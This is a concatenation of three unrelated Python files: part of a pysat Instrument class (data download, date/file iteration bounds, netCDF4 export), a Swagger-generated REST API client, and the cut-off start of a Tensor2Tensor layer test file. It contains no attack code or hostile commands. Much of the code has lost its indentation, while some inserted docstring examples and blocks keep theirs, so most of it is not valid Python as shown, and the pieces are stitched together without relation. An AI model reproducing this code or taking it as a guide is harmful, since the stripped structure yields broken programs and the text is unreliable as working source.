if (self.data.index[-1] == last_time) & (not want_last_pad):
self.data = self.data.iloc[:-1, :]
# transfer any extra attributes in meta to the Instrument object
self.meta.transfer_attributes_to_instrument(self)
sys.stdout.flush()
return
def download(self, start, stop, freq='D', user=None, password=None):
"""Download data for given Instrument object from start to stop.
Parameters
----------
start : pandas.datetime
start date to download data
stop : pandas.datetime
stop date to download data
        freq : string
            Step size between dates for the season, 'D' for daily, 'M' for
            monthly (see pandas)
user : string
username, if required by instrument data archive
password : string
password, if required by instrument data archive
Note
----
        Data will be downloaded to pysat_data_dir/platform/name/tag
If Instrument bounds are set to defaults they are updated
after files are downloaded.
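        Examples
        --------
        ::
            # illustrative date range and credentials
            start = pysat.datetime(2009, 1, 1)
            stop = pysat.datetime(2009, 1, 31)
            inst.download(start, stop, user='username', password='password')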
"""
import errno
# make sure directories are there, otherwise create them
try:
os.makedirs(self.files.data_path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
print('Downloading data to: ', self.files.data_path)
date_array = utils.season_date_range(start, stop, freq=freq)
if user is None:
self._download_rtn(date_array,
tag=self.tag,
sat_id=self.sat_id,
data_path=self.files.data_path)
else:
self._download_rtn(date_array,
tag=self.tag,
sat_id=self.sat_id,
data_path=self.files.data_path,
user=user,
password=password)
# get current file date range
first_date = self.files.start_date
last_date = self.files.stop_date
print('Updating pysat file list')
self.files.refresh()
# if instrument object has default bounds, update them
if len(self.bounds[0]) == 1:
if(self.bounds[0][0] == first_date and
self.bounds[1][0] == last_date):
print('Updating instrument object bounds.')
self.bounds = None
@property
def bounds(self):
"""Boundaries for iterating over instrument object by date or file.
Parameters
----------
start : datetime object, filename, or None (default)
start of iteration, if None uses first data date.
list-like collection also accepted
end : datetime object, filename, or None (default)
end of iteration, inclusive. If None uses last data date.
list-like collection also accepted
Note
----
Both start and stop must be the same type (date, or filename) or None
Examples
--------
::
inst = pysat.Instrument(platform=platform,
name=name,
tag=tag)
start = pysat.datetime(2009,1,1)
stop = pysat.datetime(2009,1,31)
inst.bounds = (start,stop)
            start2 = pysat.datetime(2010,1,1)
stop2 = pysat.datetime(2010,2,14)
inst.bounds = ([start, start2], [stop, stop2])
"""
return self._iter_start, self._iter_stop
@bounds.setter
def bounds(self, value=None):
if value is None:
value = (None, None)
if len(value) < 2:
            raise ValueError('Must supply both a start and end date/file. ' +
                             'Supply None if you want the first/last possible.')
start = value[0]
end = value[1]
# get the frequency, or step size, of season
if len(value) == 3:
step = value[2]
else:
# default do daily
step = 'D'
if (start is None) and (end is None):
# set default
self._iter_start = [self.files.start_date]
self._iter_stop = [self.files.stop_date]
self._iter_type = 'date'
if self._iter_start[0] is not None:
# check here in case Instrument is initialized with no input
self._iter_list = utils.season_date_range(self._iter_start, self._iter_stop, freq=step)
elif (hasattr(start, '__iter__') and not isinstance(start,str)) and (hasattr(end, '__iter__') and not isinstance(end,str)):
base = type(start[0])
for s, t in zip(start, end):
if (type(s) != type(t)) or (type(s) != base):
raise ValueError('Start and end items must all be of the same type')
if isinstance(start[0], str):
self._iter_type = 'file'
self._iter_list = self.files.get_file_array(start, end)
elif isinstance(start[0], pds.datetime):
self._iter_type = 'date'
self._iter_list = utils.season_date_range(start, end, freq=step)
else:
raise ValueError('Input is not a known type, string or datetime')
self._iter_start = start
self._iter_stop = end
elif (hasattr(start, '__iter__') and not isinstance(start,str)) or (hasattr(end, '__iter__') and not isinstance(end,str)):
raise ValueError('Both start and end must be iterable if one bound is iterable')
elif isinstance(start, str) or isinstance(end, str):
if isinstance(start, pds.datetime) or isinstance(end, pds.datetime):
raise ValueError('Not allowed to mix file and date bounds')
if start is None:
start = self.files[0]
if end is None:
end = self.files.files[-1]
self._iter_start = [start]
self._iter_stop = [end]
self._iter_list = self.files.get_file_array(self._iter_start, self._iter_stop)
self._iter_type = 'file'
elif isinstance(start, pds.datetime) or isinstance(end, pds.datetime):
if start is None:
start = self.files.start_date
if end is None:
end = self.files.stop_date
self._iter_start = [start]
self._iter_stop = [end]
self._iter_list = utils.season_date_range(start, end, freq=step)
self._iter_type = 'date'
else:
raise ValueError('Provided an invalid combination of bounds. ' +
'if specifying by file, both bounds must be by file. Other ' +
'combinations of datetime objects and None are allowed.')
def __iter__(self):
"""Iterates instrument object by loading subsequent days or files.
Note
----
Limits of iteration, and iteration type (date/file)
set by `bounds` attribute.
Default bounds are the first and last dates from files on local system.
Examples
--------
::
inst = pysat.Instrument(platform=platform,
name=name,
tag=tag)
start = pysat.datetime(2009,1,1)
stop = pysat.datetime(2009,1,31)
inst.bounds = (start,stop)
for inst in inst:
print('Another day loaded', inst.date)
"""
if self._iter_type == 'file':
for fname in self._iter_list:
self.load(fname=fname)
yield self
elif self._iter_type == 'date':
for date in self._iter_list:
self.load(date=date)
yield self
def next(self, verifyPad=False):
"""Manually iterate through the data loaded in Instrument object.
Bounds of iteration and iteration type (day/file) are set by
`bounds` attribute.
Note
----
        If there were no previous calls to load then the
        first day (by default) or file within bounds will be loaded.
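        Examples
        --------
        ::
            # illustrative; assumes bounds already set or default bounds
            inst.next()   # load first day/file within bounds
            inst.next()   # advance to the following day/file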
"""
if self._iter_type == 'date':
if self.date is not None:
idx, = np.where(self._iter_list == self.date)
if (len(idx) == 0) | (idx+1 >= len(self._iter_list)):
raise StopIteration('Outside the set date boundaries.')
else:
idx += 1
self.load(date=self._iter_list[idx[0]], verifyPad=verifyPad)
else:
self.load(date=self._iter_list[0], verifyPad=verifyPad)
elif self._iter_type == 'file':
if self._fid is not None:
first = self.files.get_index(self._iter_list[0])
last = self.files.get_index(self._iter_list[-1])
if (self._fid < first) | (self._fid+1 > last):
raise StopIteration('Outside the set file boundaries.')
else:
self.load(fname=self._iter_list[self._fid+1-first], verifyPad=verifyPad)
else:
self.load(fname=self._iter_list[0], verifyPad=verifyPad)
def prev(self, verifyPad=False):
"""Manually iterate backwards through the data in Instrument object.
Bounds of iteration and iteration type (day/file)
are set by `bounds` attribute.
Note
----
        If there were no previous calls to load then the
        last day or file within bounds will be loaded.
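        Examples
        --------
        ::
            # illustrative; step backward after a load() or next()
            inst.prev()   # load the preceding day/file within bounds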
"""
if self._iter_type == 'date':
if self.date is not None:
idx, = np.where(self._iter_list == self.date)
if (len(idx) == 0) | (idx-1 < 0):
raise StopIteration('Outside the set date boundaries.')
else:
idx -= 1
self.load(date=self._iter_list[idx[0]], verifyPad=verifyPad)
else:
self.load(date=self._iter_list[-1], verifyPad=verifyPad)
elif self._iter_type == 'file':
if self._fid is not None:
first = self.files.get_index(self._iter_list[0])
last = self.files.get_index(self._iter_list[-1])
if (self._fid-1 < first) | (self._fid > last):
raise StopIteration('Outside the set file boundaries.')
else:
self.load(fname=self._iter_list[self._fid-1-first], verifyPad=verifyPad)
else:
self.load(fname=self._iter_list[-1], verifyPad=verifyPad)
def _get_data_info(self, data, format):
# get type of data
data_type = data.dtype
# check if older format
if format[:7] == 'NETCDF3':
old_format = True
else:
old_format = False
        # check for object type
        if data_type != np.dtype('O'):
            # simple data, not an object
            # no 64-bit ints in netCDF3
            if (data_type == np.int64) & old_format:
                data = data.astype(np.int32)
                data_type = data.dtype
            if data_type == np.dtype('<M8[ns]'):
                if not old_format:
                    data_type = np.int64
                else:
                    data_type = np.float
                datetime_flag = True
            else:
                datetime_flag = False
        else:
            # dealing with a more complicated object; handled by the caller
            datetime_flag = False
        return data, data_type, datetime_flag
def to_netcdf4(self, fname=None, format=None, base_instrument=None):
"""Stores loaded data into a netCDF3/4 file.
Parameters
----------
fname : string
full path to save instrument object to
format : string
format keyword passed to netCDF4 routine
NETCDF3_CLASSIC, NETCDF3_64BIT, NETCDF4_CLASSIC, and NETCDF4
base_instrument : pysat.Instrument
used as a comparison, only attributes that are present with
self and not on base_instrument are written to netCDF
Note
----
Stores 1-D data along dimension 'epoch' - the date time index.
Stores object data (e.g. dataframes within series) separately
- The name of the series is used to prepend extra variable
dimensions within netCDF, key_2, key_3; first dimension time
- The index organizing the data stored as key_sample_index
- from_netcdf3 uses this naming scheme to reconstruct data structure
The datetime index is stored as 'UNIX time'. netCDF-3 doesn't support
64-bit integers so it is stored as a 64-bit float. This results in a
loss of datetime precision when converted back to datetime index
up to hundreds of nanoseconds. Use netCDF4 if this is a problem.
All attributes attached to instrument meta are written to netCDF attrs.
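        Examples
        --------
        ::
            # illustrative output path
            inst.to_netcdf4(fname='./inst_data.nc', format='NETCDF4')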
"""
import netCDF4
import pysat
if format is None:
format = 'NETCDF4'
else:
format = format.upper()
base_instrument = Instrument() if base_instrument is None else base_instrument
with netCDF4.Dataset(fname, mode='w', format=format) as out_data:
num = len(self.data.index)
out_data.createDimension('epoch', num)
# write out the datetime index
if format == 'NETCDF4':
cdfkey = out_data.createVariable('epoch', 'i8', dimensions=('epoch'),)
cdfkey.units = 'Microseconds since 1970-1-1 00:00:00'
cdfkey[:] = (self.data.index.values.astype(np.int64)*1E-3).astype(np.int64)
else:
# can't store full time resolution
cdfkey = out_data.createVariable('epoch', 'f8', dimensions=('epoch'),)
cdfkey.units = 'Milliseconds since 1970-1-1 00:00:00'
cdfkey[:] = (self.data.index.values.astype(int)*1.E-6).astype(np.float)
cdfkey.long_name = 'UNIX time'
cdfkey.calendar = 'standard'
# store all of the data in dataframe columns
for key in self.data.columns:
# print ('key', key)
# print (self[key])
if self[key].dtype != np.dtype('O'):
# not an object, simple column of data, write it out
if ((self[key].dtype == np.int64) & (format[:7] == 'NETCDF3')):
self[key] = self[key].astype(np.int32)
# check if it is a datetime column
datetime_flag = False
coltype = self[key].dtype
# check for datetime index
if coltype == np.dtype('<M8[ns]'):
if format == 'NETCDF4':
coltype = np.int64
else:
coltype = np.float
datetime_flag = True
# print ('gonna create variable')
cdfkey = out_data.createVariable(key,
coltype,
dimensions=('epoch'), )
# print ('created')
# attach any meta data
try:
new_dict = self.meta[key].to_dict()
if u'_FillValue' in new_dict.keys():
# make sure _FillValue is the same type as the data
new_dict['_FillValue'] = np.array(new_dict['_FillValue']).astype(self[key].dtype)
if u'FillVal' in new_dict.keys():
# make sure _FillValue is the same type as the data
new_dict['FillVal'] = np.array(new_dict['FillVal']).astype(self[key].dtype)
# really attach metadata now
cdfkey.setncatts(new_dict)
                    except Exception:
                        print(' '.join(('Unable to find MetaData for', key)))
if datetime_flag:
if format == 'NETCDF4':
# cdfkey.units = 'Microseconds since 1970-1-1 00:00:00'
cdfkey[:] = (self[key].values.astype(coltype)*1.E-3).astype(coltype)
else:
# cdfkey.units = 'Milliseconds since 1970-1-1 00:00:00'
cdfkey[:] = (self[key].values.astype(coltype)*1.E-6).astype(coltype)
# cdfkey.long_name = 'UNIX time'
else:
# #cdfkey.units = ''
# if self[key].iloc[0].index.name is not None:
# cdfkey.long_name = self[key].iloc[0].index.name
# else:
# cdfkey.long_name = key
cdfkey[:] = self[key].values #.to_native_types()
# attach the data
# cdfkey[:] = self[key].values
else:
if not isinstance(self[0, key], pysat.DataFrame):
# dealing with a string
cdfkey = out_data.createVariable(key,
'S30',
dimensions=('epoch'), )
# attach any meta data
try:
new_dict = self.meta[key].to_dict()
if u'_FillValue' in new_dict.keys():
# make sure _FillValue is the same type as the data
new_dict['_FillValue'] = np.array(new_dict['_FillValue']).astype(self[key].dtype)
if u'FillVal' in new_dict.keys():
# make sure _FillValue is the same type as the data
new_dict['FillVal'] = np.array(new_dict['FillVal']).astype(self[key].dtype)
# really attach metadata now
cdfkey.setncatts(new_dict)
                        except Exception:
                            print(' '.join(('Unable to find MetaData for', key)))
else:
# we are dealing with a more complicated object
# presuming a series with a dataframe in each location
dims = np.shape(self[key].iloc[0])
obj_dim_names = []
for i, dim in enumerate(dims[:-1]):
# don't need to go over last dimension value,
# it covers number of columns
obj_dim_names.append(key+'_dim_%i' % (i+1))
out_data.createDimension(obj_dim_names[-1], dim)
# total dimensions stored for object are epoch plus ones just above
var_dim = tuple(['epoch']+obj_dim_names)
#print (key, var_dim)
# iterate over columns and store
try:
iterable = self[key].iloc[0].columns
is_frame = True
except AttributeError:
# looking at a series, which doesn't have columns
iterable = self[key].iloc[0].name
is_frame = False
for col in iterable:
if is_frame:
coltype = self[key].iloc[0][col].dtype
else:
coltype = self[key].iloc[0].dtype
if ((coltype == np.int64) & (format[:7] == 'NETCDF3')):
coltype = np.int32
#elif coltype == np.dtype('O'):
# if isinstance(self[key].iloc[0][col][0], basestring):
# coltype = 'S1'
#print (key+'_' +col, var_dim, coltype)
cdfkey = out_data.createVariable(key + '_' +col,
coltype,
dimensions=var_dim)
#cdfkey.long_name = col
#cdfkey.units = ''
if is_frame:
# attach any meta data
try:
cdfkey.setncatts(self.meta[key][col].to_dict())
                                except Exception:
                                    print(' '.join(('Unable to find MetaData for', key, col)))
# attach data
for i in range(num):
cdfkey[i, :] = self[key].iloc[i][col].values.astype(coltype)
else:
# attach any meta data
cdfkey.setncatts(self.meta[key].to_dict())
# attach data
for i in range(num):
cdfkey[i, :] = self[key].iloc[i].values.astype(coltype)
# store the dataframe index for each time of main dataframe
datetime_flag = False
coltype = self[key].iloc[0].index.dtype
# check for datetime index
if coltype == np.dtype('<M8[ns]'):
if format == 'NETCDF4':
coltype = np.int64
else:
coltype = np.float
datetime_flag = True
#if coltype == np.int64:
# coltype = np.int32
#print (key+'_' + '_ample', var_dim, coltype)
cdfkey = out_data.createVariable(key+'_dim_1',
coltype, dimensions=var_dim)
if datetime_flag:
#print('datetime flag')
if format == 'NETCDF4':
cdfkey.units = 'Microseconds since 1970-1-1 00:00:00'
for i in range(num):
cdfkey[i, :] = (self[key].iloc[i].index.values.astype(coltype)*1.E-3).astype(coltype)
else:
cdfkey.units = 'Milliseconds since 1970-1-1 00:00:00'
for i in range(num):
cdfkey[i, :] = (self[key].iloc[i].index.values.astype(coltype)*1.E-6).astype(coltype)
cdfkey.long_name = 'UNIX time'
else:
#cdfkey.units = ''
if self[key].iloc[0].index.name is not None:
cdfkey.long_name = self[key].iloc[0].index.name
else:
cdfkey.long_name = key
for i in range(num):
cdfkey[i, :] = self[key].iloc[i].index.to_native_types()
# store any non standard attributes
base_attrb = dir(base_instrument)
this_attrb = dir(self)
adict = {}
for key in this_attrb:
if key not in base_attrb:
if key[0] != '_':
adict[key] = self.__getattribute__(key)
# store any non-standard attributes attached to meta
base_attrb = dir(base_instrument.meta)
this_attrb = dir(self.meta)
for key in this_attrb:
if key not in base_attrb:
if key[0] != '_':
adict[key] = self.meta.__getattribute__(key)
adict['pysat_version'] = pysat.__version__
adict['Conventions'] = 'CF-1.6'
# check for binary types
for key in adict.keys():
if isinstance(adict[key], bool):
adict[key] = int(adict[key])
out_data.setncatts(adict)
return
|
|
# coding: utf-8
"""
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import re
import json
import mimetypes
import sys
import tempfile
import threading
from datetime import date, datetime
# python 2 and python 3 compatibility library
from six import PY3, integer_types, iteritems, text_type
from six.moves.urllib.parse import quote
from . import models
from .configuration import Configuration
from .rest import ApiException, RESTClientObject
from builtins import str as text
class ApiClient(object):
"""
Generic API client for Swagger client library builds.
Swagger generic API client. This client handles the client-
server communication, and is invariant across implementations. Specifics of
the methods and models for each application are generated from the Swagger
templates.
NOTE: This class is auto generated by the swagger code generator program.
Ref: https://github.com/swagger-api/swagger-codegen
Do not edit the class manually.
:param host: The base path for the server to call.
:param header_name: a header to pass when making calls to the API.
:param header_value: a header value to pass when making calls to the API.
"""
PRIMITIVE_TYPES = (float, bool, bytes, text_type) + integer_types
NATIVE_TYPES_MAPPING = {
'int': int,
'long': int if PY3 else long,
'float': float,
'str': str,
'bool': bool,
'date': date,
'datetime': datetime,
'object': object,
}
def __init__(self, host=None, header_name=None, header_value=None, cookie=None):
"""
Constructor of the class.
"""
self.rest_client = RESTClientObject()
self.default_headers = {}
if header_name is not None:
self.default_headers[header_name] = header_value
if host is None:
self.host = Configuration().host
else:
self.host = host
self.cookie = cookie
# Set default User-Agent.
self.user_agent = 'Swagger-Codegen/1.0.0/python'
@property
def user_agent(self):
"""
Gets user agent.
"""
return self.default_headers['User-Agent']
@user_agent.setter
def user_agent(self, value):
"""
Sets user agent.
"""
self.default_headers['User-Agent'] = value
def set_default_header(self, header_name, header_value):
self.default_headers[header_name] = header_value
def __call_api(self, resource_path, method,
path_params=None, query_params=None, header_params=None,
body=None, post_params=None, files=None,
response_type=None, auth_settings=None, callback=None,
_return_http_data_only=None, collection_formats=None, _preload_content=True,
_request_timeout=None):
config = Configuration()
# header parameters
header_params = header_params or {}
header_params.update(self.default_headers)
if self.cookie:
header_params['Cookie'] = self.cookie
if header_params:
header_params = self.sanitize_for_serialization(header_params)
header_params = dict(self.parameters_to_tuples(header_params,
collection_formats))
# path parameters
if path_params:
path_params = self.sanitize_for_serialization(path_params)
path_params = self.parameters_to_tuples(path_params,
collection_formats)
for k, v in path_params:
# specified safe chars, encode everything
resource_path = resource_path.replace(
'{%s}' % k, quote(str(v), safe=config.safe_chars_for_path_param))
# query parameters
if query_params:
query_params = self.sanitize_for_serialization(query_params)
query_params = self.parameters_to_tuples(query_params,
collection_formats)
# post parameters
if post_params or files:
post_params = self.prepare_post_parameters(post_params, files)
post_params = self.sanitize_for_serialization(post_params)
post_params = self.parameters_to_tuples(post_params,
collection_formats)
# auth setting
self.update_params_for_auth(header_params, query_params, auth_settings)
# body
if body:
body = self.sanitize_for_serialization(body)
# request url
url = self.host + resource_path
# perform request and return response
response_data = self.request(method, url,
query_params=query_params,
headers=header_params,
post_params=post_params, body=body,
_preload_content=_preload_content,
_request_timeout=_request_timeout)
self.last_response = response_data
return_data = response_data
if _preload_content:
# deserialize response data
if response_type:
return_data = self.deserialize(response_data, response_type)
else:
return_data = None
if callback:
if _return_http_data_only:
callback(return_data)
else:
callback((return_data, response_data.status, response_data.getheaders()))
elif _return_http_data_only:
return (return_data)
else:
return (return_data, response_data.status, response_data.getheaders())
def sanitize_for_serialization(self, obj):
"""
Builds a JSON POST object.
If obj is None, return None.
If obj is str, int, long, float, bool, return directly.
If obj is datetime.datetime, datetime.date
convert to string in iso8601 format.
If obj is list, sanitize each element in the list.
        If obj is dict, sanitize the dict's values.
If obj is swagger model, return the properties dict.
:param obj: The data to serialize.
:return: The serialized form of data.
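        Example (illustrative)::
            client.sanitize_for_serialization({'when': datetime(2018, 1, 1)})
            # -> {'when': '2018-01-01T00:00:00'}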
"""
if obj is None:
return None
elif isinstance(obj, self.PRIMITIVE_TYPES):
return obj
elif isinstance(obj, list):
return [self.sanitize_for_serialization(sub_obj)
for sub_obj in obj]
elif isinstance(obj, tuple):
return tuple(self.sanitize_for_serialization(sub_obj)
for sub_obj in obj)
elif isinstance(obj, (datetime, date)):
return obj.isoformat()
if isinstance(obj, dict):
obj_dict = obj
else:
            # Convert model obj to dict, excluding the attributes
            # `swagger_types` and `attribute_map` and any attribute
            # whose value is None. Convert attribute names to json keys
            # as given in the model definition.
obj_dict = {obj.attribute_map[attr]: getattr(obj, attr)
for attr, _ in iteritems(obj.swagger_types)
if getattr(obj, attr) is not None}
return {key: self.sanitize_for_serialization(val)
for key, val in iteritems(obj_dict)}
def deserialize(self, response, response_type):
"""
Deserializes response into an object.
:param response: RESTResponse object to be deserialized.
:param response_type: class literal for
deserialized object, or string of class name.
:return: deserialized object.
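        Example (illustrative)::
            # given a RESTResponse whose body is '["a", "b"]'
            names = client.deserialize(response, 'list[str]')
            # names == ['a', 'b']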
"""
# handle file downloading
# save response body into a tmp file and return the instance
if response_type == "file":
return self.__deserialize_file(response)
# fetch data from response object
try:
data = json.loads(response.data)
except ValueError:
data = response.data
return self.__deserialize(data, response_type)
def __deserialize(self, data, klass):
"""
Deserializes dict, list, str into an object.
:param data: dict, list or str.
:param klass: class literal, or string of class name.
:return: object.
"""
if data is None:
return None
if type(klass) == str:
if klass.startswith('list['):
                sub_kls = re.match(r'list\[(.*)\]', klass).group(1)
return [self.__deserialize(sub_data, sub_kls)
for sub_data in data]
if klass.startswith('dict('):
                sub_kls = re.match(r'dict\(([^,]*), (.*)\)', klass).group(2)
return {k: self.__deserialize(v, sub_kls)
for k, v in iteritems(data)}
# convert str to class
if klass in self.NATIVE_TYPES_MAPPING:
klass = self.NATIVE_TYPES_MAPPING[klass]
else:
klass = getattr(models, klass)
if klass in self.PRIMITIVE_TYPES:
return self.__deserialize_primitive(data, klass)
elif klass == object:
return self.__deserialize_object(data)
elif klass == date:
return self.__deserialize_date(data)
elif klass == datetime:
return self.__deserialize_datetime(data)
else:
return self.__deserialize_model(data, klass)
def call_api(self, resource_path, method,
path_params=None, query_params=None, header_params=None,
body=None, post_params=None, files=None,
response_type=None, auth_settings=None, callback=None,
_return_http_data_only=None, collection_formats=None, _preload_content=True,
_request_timeout=None):
"""
Makes the HTTP request (synchronous) and return the deserialized data.
To make an async request, define a function for callback.
:param resource_path: Path to method endpoint.
:param method: Method to call.
:param path_params: Path parameters in the url.
:param query_params: Query parameters in the url.
:param header_params: Header parameters to be
placed in the request header.
:param body: Request body.
:param post_params dict: Request post form parameters,
for `application/x-www-form-urlencoded`, `multipart/form-data`.
:param auth_settings list: Auth Settings names for the request.
:param response: Response data type.
:param files dict: key -> filename, value -> filepath,
for `multipart/form-data`.
        :param callback function: Callback function for asynchronous request.
            If this parameter is provided,
            the request will be made asynchronously.
:param _return_http_data_only: response data without head status code and headers
:param collection_formats: dict of collection formats for path, query,
header, and post parameters.
:param _preload_content: if False, the urllib3.HTTPResponse object will be returned without
reading/decoding response data. Default is True.
:param _request_timeout: timeout setting for this request. If one number provided, it will be total request
timeout. It can also be a pair (tuple) of (connection, read) timeouts.
        :return:
            If the callback parameter is provided,
            the request will be made asynchronously
            and the method will return the request thread.
            If the callback parameter is None,
            the method will return the response directly.
"""
if callback is None:
return self.__call_api(resource_path, method,
path_params, query_params, header_params,
body, post_params, files,
response_type, auth_settings, callback,
_return_http_data_only, collection_formats, _preload_content, _request_timeout)
else:
thread = threading.Thread(target=self.__call_api,
args=(resource_path, method,
path_params, query_params,
header_params, body,
post_params, files,
response_type, auth_settings,
callback, _return_http_data_only,
collection_formats, _preload_content, _request_timeout))
thread.start()
return thread
def request(self, method, url, query_params=None, headers=None,
post_params=None, body=None, _preload_content=True, _request_timeout=None):
"""
Makes the HTTP request using RESTClient.
"""
if method == "GET":
return self.rest_client.GET(url,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
headers=headers)
elif method == "HEAD":
return self.rest_client.HEAD(url,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
headers=headers)
elif method == "OPTIONS":
return self.rest_client.OPTIONS(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "POST":
return self.rest_client.POST(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "PUT":
return self.rest_client.PUT(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "PATCH":
return self.rest_client.PATCH(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "DELETE":
return self.rest_client.DELETE(url,
query_params=query_params,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
else:
raise ValueError(
"http method must be `GET`, `HEAD`, `OPTIONS`,"
" `POST`, `PATCH`, `PUT` or `DELETE`."
)
def parameters_to_tuples(self, params, collection_formats):
"""
Get parameters as list of tuples, formatting collections.
:param params: Parameters as dict or list of two-tuples
:param dict collection_formats: Parameter collection formats
:return: Parameters as list of tuples, collections formatted
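        Example (illustrative)::
            client.parameters_to_tuples({'ids': [1, 2, 3]}, {'ids': 'csv'})
            # -> [('ids', '1,2,3')]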
"""
new_params = []
if collection_formats is None:
collection_formats = {}
for k, v in iteritems(params) if isinstance(params, dict) else params:
if k in collection_formats:
collection_format = collection_formats[k]
if collection_format == 'multi':
new_params.extend((k, value) for value in v)
else:
if collection_format == 'ssv':
delimiter = ' '
elif collection_format == 'tsv':
delimiter = '\t'
elif collection_format == 'pipes':
delimiter = '|'
else: # csv is the default
delimiter = ','
new_params.append(
(k, delimiter.join(str(value) for value in v)))
else:
new_params.append((k, v))
return new_params
def prepare_post_parameters(self, post_params=None, files=None):
"""
Builds form parameters.
:param post_params: Normal form parameters.
:param files: File parameters.
:return: Form parameters with files.
"""
params = []
if post_params:
params = post_params
if files:
for k, v in iteritems(files):
if not v:
continue
file_names = v if type(v) is list else [v]
for n in file_names:
with open(n, 'rb') as f:
filename = os.path.basename(f.name)
filedata = f.read()
mimetype = mimetypes.\
guess_type(filename)[0] or 'application/octet-stream'
params.append(tuple([k, tuple([filename, filedata, mimetype])]))
return params
def select_header_accept(self, accepts):
"""
Returns `Accept` based on an array of accepts provided.
:param accepts: List of headers.
:return: Accept (e.g. application/json).
"""
if not accepts:
return
accepts = [x.lower() for x in accepts]
if 'application/json' in accepts:
return 'application/json'
else:
return ', '.join(accepts)
def select_header_content_type(self, content_types):
"""
Returns `Content-Type` based on an array of content_types provided.
:param content_types: List of content-types.
:return: Content-Type (e.g. application/json).
"""
if not content_types:
return 'application/json'
content_types = [x.lower() for x in content_types]
if 'application/json' in content_types or '*/*' in content_types:
return 'application/json'
else:
return content_types[0]
def update_params_for_auth(self, headers, querys, auth_settings):
"""
Updates header and query params based on authentication setting.
:param headers: Header parameters dict to be updated.
:param querys: Query parameters tuple list to be updated.
:param auth_settings: Authentication setting identifiers list.
"""
config = Configuration()
if not auth_settings:
return
for auth in auth_settings:
auth_setting = config.auth_settings().get(auth)
if auth_setting:
if not auth_setting['value']:
continue
elif auth_setting['in'] == 'header':
headers[auth_setting['key']] = auth_setting['value']
elif auth_setting['in'] == 'query':
querys.append((auth_setting['key'], auth_setting['value']))
else:
raise ValueError(
'Authentication token must be in `query` or `header`'
)
def __deserialize_file(self, response):
"""
Saves response body into a file in a temporary folder,
using the filename from the `Content-Disposition` header if provided.
:param response: RESTResponse.
:return: file path.
"""
config = Configuration()
fd, path = tempfile.mkstemp(dir=config.temp_folder_path)
os.close(fd)
os.remove(path)
content_disposition = response.getheader("Content-Disposition")
if content_disposition:
filename = re.\
search(r'filename=[\'"]?([^\'"\s]+)[\'"]?', content_disposition).\
group(1)
path = os.path.join(os.path.dirname(path), filename)
with open(path, "w") as f:
f.write(response.data)
return path
def __deserialize_primitive(self, data, klass):
"""
Deserializes string to primitive type.
:param data: str.
:param klass: class literal.
:return: int, long, float, str, bool.
"""
try:
return klass(data)
except UnicodeEncodeError:
return text(data)
except TypeError:
return data
def __deserialize_object(self, value):
"""
        Return the original value.
:return: object.
"""
return value
def __deserialize_date(self, string):
"""
Deserializes string to date.
:param string: str.
:return: date.
"""
try:
from dateutil.parser import parse
return parse(string).date()
except ImportError:
return string
except ValueError:
raise ApiException(
status=0,
reason="Failed to parse `{0}` into a date object".format(string)
)
def __deserialize_datetime(self, string):
"""
        Deserializes a numeric timestamp to datetime.
        The value is interpreted as milliseconds since the Unix epoch.
        :param string: int or float timestamp in milliseconds.
:return: datetime.
"""
try:
from dateutil.parser import parse
timestr = str(datetime.fromtimestamp(string/1000))
return parse(timestr)
except ImportError:
return string
except ValueError:
raise ApiException(
status=0,
reason=(
"Failed to parse `{0}` into a datetime object"
.format(string)
)
)
def __deserialize_model(self, data, klass):
"""
Deserializes list or dict to model.
:param data: dict, list.
:param klass: class literal.
:return: model object.
"""
if not klass.swagger_types:
return data
kwargs = {}
for attr, attr_type in iteritems(klass.swagger_types):
if data is not None \
and klass.attribute_map[attr] in data \
and isinstance(data, (list, dict)):
value = data[klass.attribute_map[attr]]
kwargs[attr] = self.__deserialize(value, attr_type)
instance = klass(**kwargs)
return instance
|
|
# coding=utf-8
# Copyright 2018 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for common layers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
import numpy as np
from tensor2tensor.layers import common_layers
import tensorflow as tf
class CommonLayersTest(parameterized.TestCase, tf.test.TestCase):
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testIndexLastDimWithIndices(self):
x = np.array([[2., 3., 4., 5.],
[6., 7., 8., 9.]])
indices = np.array([2, 0])
x_idx = common_layers.index_last_dim_with_indices(x, indices)
expected = np.array([4., 6.])
self.assertAllEqual(expected, self.evaluate(x_idx))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testSaturatingSigmoid(self):
x = np.array([-120.0, -100.0, 0.0, 100.0, 120.0], dtype=np.float32)
y = common_layers.saturating_sigmoid(tf.constant(x))
res = self.evaluate(y)
self.assertAllClose(res, [0.0, 0.0, 0.5, 1.0, 1.0])
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testFlatten4D3D(self):
x = np.random.random_integers(1, high=8, size=(3, 5, 2))
y = common_layers.flatten4d3d(common_layers.embedding(x, 10, 7))
self.evaluate(tf.global_variables_initializer())
res = self.evaluate(y)
self.assertEqual(res.shape, (3, 5 * 2, 7))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testEmbedding(self):
x = np.random.random_integers(1, high=8, size=(3, 5))
y = common_layers.embedding(x, 10, 16)
